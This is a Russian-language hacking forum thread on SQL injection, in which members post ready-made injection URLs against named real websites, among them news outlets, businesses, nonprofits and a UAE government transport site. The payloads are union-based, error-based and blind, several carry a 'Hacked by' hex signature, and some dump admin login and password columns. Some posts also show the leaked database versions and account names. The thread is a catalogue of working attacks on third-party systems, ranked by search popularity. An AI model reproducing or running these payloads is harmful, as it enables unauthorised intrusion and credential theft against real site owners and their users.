SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Code:
    http://vniispk.ru/news/konferenciya_2008/article.php?id=-6+and+1=0+Union+Select+1,2,3,4,5,0x4861636b6564206279205365706f,7,8--
     
  2. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    ================================
    ================================
    ================================
    ================================
    ================================
     
  3. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    тиц 2900
    HTML:
    http://rzd.inte[google]rgid.ru/index.php
    уязвимы поля "Откуда" и "Куда", выводит сразу же :)
    Пример "'union select version() -- "


    5.5.13-log
    [email protected]
     
    #15523 Br@!ns, 14 Aug 2013
    Last edited: 14 Aug 2013
    2 people like this.
  4. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    ================================
    pr=2
    ================================
    ================================
     
  5. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Code:
    http://www.bullydog.com/preferred_dealer.php?dealer=-1+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,0x4861636b6564206279205365706f--
     
    2 people like this.
  6. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    ================================
    blind, mysql 5 ветки
    ================================
    ================================
     
  7. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    ================================
    pr=4, blind, mysql 5 версии
     
    1 person likes this.
  8. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Фотограф Павел Киселёв (смотреть title)
    Code:
    http://www.photokiselev.com/info.php?CID=-3+union+select+1,2,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28u36043.student%29where%280x00%29in%28@x:=concat%28@x,0x3c62723e,login,0x3a,pass%29%29%29%29x%29,4,5,6,7,8,9+--+
    Еженедельная Газета "Центр Города" (Наро-Фоминск)
    Code:
    http://cgnf.ru/rubric.php?id=2112+and+1=2+union+select+1,2,3,4,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28cgnf.tch_users%29where%280x00%29in%28@x:=concat%28@x,user_login,0x3a,user_password%29%29%29%29x%29,6,7,8,9+--+
    См. исходный код страницы 254 строка.
     
    #15528 Unknowhacker, 16 Aug 2013
    Last edited: 16 Aug 2013
    1 person likes this.
  9. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    GOV

    SHARJAH INTERCITY TRANSPORT
    Code:
    http://www.stc.gov.ae/en/transport-intercity-routes-result.php?id=-112+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13--
     
  10. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Notoriety Inc.
    Code:
    http://www.hanhdance.com/contact.php?id=-46+union+select+1,2,3,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28hanhdanceeditor.admin_users%29where%280x00%29in%28@x:=concat%28@x,0x3c62723e,username,0x3a,password%29%29%29%29x%29,5,6,7,8+--+
    .:Урукхаи:.
    Code:
    http://www.urukhai.ru/comment.php?id=59%27+union+select+1,2,3,4,version%28%29,6,7+--+
    4.1.22-lk-log
     
    #15530 Unknowhacker, 17 Aug 2013
    Last edited: 17 Aug 2013
  11. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    тиц 140
     
    2 people like this.
  12. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    ================================
    ================================
    ================================
    blind, mysql 5 ветки
    ================================
     
    #15532 YaBtr, 19 Aug 2013
    Last edited: 19 Aug 2013
  13. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Code:
    http://www.hkyongnuo.com/e-detail.php?ID=288+and+%28select*from%28select+count%28*%29from%28select+1+union+select+2+union+select+3%29x+group+by+concat%28mid%28%28select+TABLE_NAME+from+INFORMATION_SCHEMA.TABLES+limit+0,1%29,1,64%29,floor%28rand%280%29*2%29%29%29z%29+and+1
    Future Fins Surf Board Techlology
    Code:
    http://www.futuresfins.com/fin-detail.php?id=-173+union+select+1,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28Future_future2.users%29where%280x00%29in%28@x:=concat%28@x,0x3c62723e,username,0x3a,password%29%29%29%29x%29,3,4,5,6,7,8,9,10,11+--+
    Азиатско социально-экономическое общество

    Code:
    http://www.aessweb.com/journal-detail.php?id=-5002%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28pdoajcom_aess.users%29where%280x00%29in%28@x:=concat%28@x,0x3c62723e,loginid,0x3a,pwd%29%29%29%29x%29+--+
    ПромХимия
    Code:
    http://www.phas.ru/products.php?id=-64+union+select+1,2,3,4,version%28%29+--+
    4.1.22-standard-log
     
    #15533 Unknowhacker, 19 Aug 2013
    Last edited: 19 Aug 2013
    1 person likes this.
  14. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    blind, mysql 5 версии
    ================================
    ================================
    ================================
     
    #15534 YaBtr, 20 Aug 2013
    Last edited: 20 Aug 2013
    1 person likes this.
  15. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    blind
    ================================
    ================================
     
  16. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    ГРУППА КОМПАНИЙ Интерком Холдинг
    Code:
    http://www.gleot.com/news.php3?nid=-94%27+union+select+1,2,3,4,5,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29,7,8+--+
     
    1 person likes this.
  17. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Сегодня blind
    ================================
    ================================
    ================================
     
    1 person likes this.
  18. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    sfjb.org PR-5
    Code:
    http://sfjb.org/news/index.php?newsid=-314+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7+--+
    Code:
     5.0.67-COMMUNITY:SFJB@LOCALHOST:SFJBDB
    tribalnetonline.com PR-5
    Code:
    http://tribalnetonline.com/displaynews.php?newsid=-213+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+--+
    Code:
    5.0.96-community-log:tribal6@localhost:tribal6_main
    beywatch.eu PR-5
    Code:
    http://beywatch.eu/veille_detail.php?num=-59+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18+--+
    Code:
    5.5.33-log:istseaeu_bayroot@localhost:istseaeu_beywatch
    drii.org PR-6
    Code:
    https://drii.org/newsdetails.php?newsid=-5'+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,0,11,12,13,14,15+--+
    Code:
    5.0.91-community:driwebm_mydri2@localhost:driwebm_mydri2
     
    1 person likes this.
  19. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    ================================
    ================================
     
  20. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    http://2012over.ru/m'or(1=(select(1)from(select/**/count(*),concat(0x427920496E6F6D73,0x3A,user(),0x3A,version(),0x3A,database(),floor(rand(0)*2))w/**/from(information_schema.columns)/**/group/**/by/**/w)a))and('')='
     
    #15540 Inoms, 23 Aug 2013
    Last edited: 23 Aug 2013
Thread Status:
Not open for further replies.